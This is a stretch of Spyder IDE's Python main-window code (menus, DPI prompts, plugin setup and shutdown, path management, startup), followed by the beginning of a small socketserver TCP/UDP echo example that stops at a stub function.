add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attribute
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.daemon = True
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(_(
    "A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled(
    readwrite_editor and widget.document().isUndoAvailable())
self.redo_action.setEnabled(
    readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
        Execute lines in the IPython console and, if requested, give focus
        back to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
        Open filename with the appropriate application.

        Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
        or open the file outside Spyder (if the extension is not supported).
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
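        # Insert after index 0 so the first entry (normally the script's or
        # current working directory) keeps its priority in sys.path.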
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
            except Exception:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
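        """Listen on a local socket for file names sent by other Spyder
        instances and emit sig_open_external_file for each one received."""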
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
        # Note: the +6 pixels on top make it look better.
        # FIXME: Why is this using the toolbars menu? A: So the switcher is
        # not placed on top of the toolbars.
        # The toolbars should probably only be taken into account for this
        # delta when they are visible.
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
tcpudp.py
|
import socketserver
from multiprocessing import Process, Pool
import time
from concurrent.futures.thread import ThreadPoolExecutor
from concurrent.futures.process import ProcessPoolExecutor
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
# self.request is the TCP socket connected to the client
print('tcp handler')
self.data = self.request.recv(1024).strip()
print("{} tcp handler wrote:".format(self.client_address[0]))
print(self.data)
# just send back the same data, but upper-cased
self.request.sendall(self.data.upper())
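
# A minimal client sketch (not part of the original script) showing how the
# TCP handler above behaves: the server echoes the request back upper-cased.
def tcp_client_demo(host="127.0.0.1", port=8888, message=b"hello tcp"):
    import socket
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((host, port))
        sock.sendall(message)
        reply = sock.recv(1024)
    print("TCP reply:", reply)  # expected: b'HELLO TCP'
    return reply
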
class MyUDPHandler(socketserver.BaseRequestHandler):
"""
This class works similar to the TCP handler class, except that
self.request consists of a pair of data and client socket, and since
there is no connection the client address must be given explicitly
when sending data back via sendto().
"""
def handle(self):
data = self.request[0].strip()
print('udp handler')
socket = self.request[1]
print("{} udphandler wrote:".format(self.client_address[0]))
print(data)
socket.sendto(data.lower(), self.client_address)
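
# A minimal client sketch (not part of the original script) showing how the
# UDP handler above behaves: the server sends the datagram back lower-cased.
def udp_client_demo(host="127.0.0.1", port=8888, message=b"HELLO UDP"):
    import socket
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(message, (host, port))
        reply, _addr = sock.recvfrom(1024)
    print("UDP reply:", reply)  # expected: b'hello udp'
    return reply
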
def tcp_task(host, port):
print(host, port)
